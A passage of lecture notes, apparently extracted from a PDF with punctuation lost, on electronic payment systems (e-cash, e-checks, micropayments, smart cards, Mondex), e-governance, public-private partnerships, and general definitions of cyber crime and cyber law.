Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
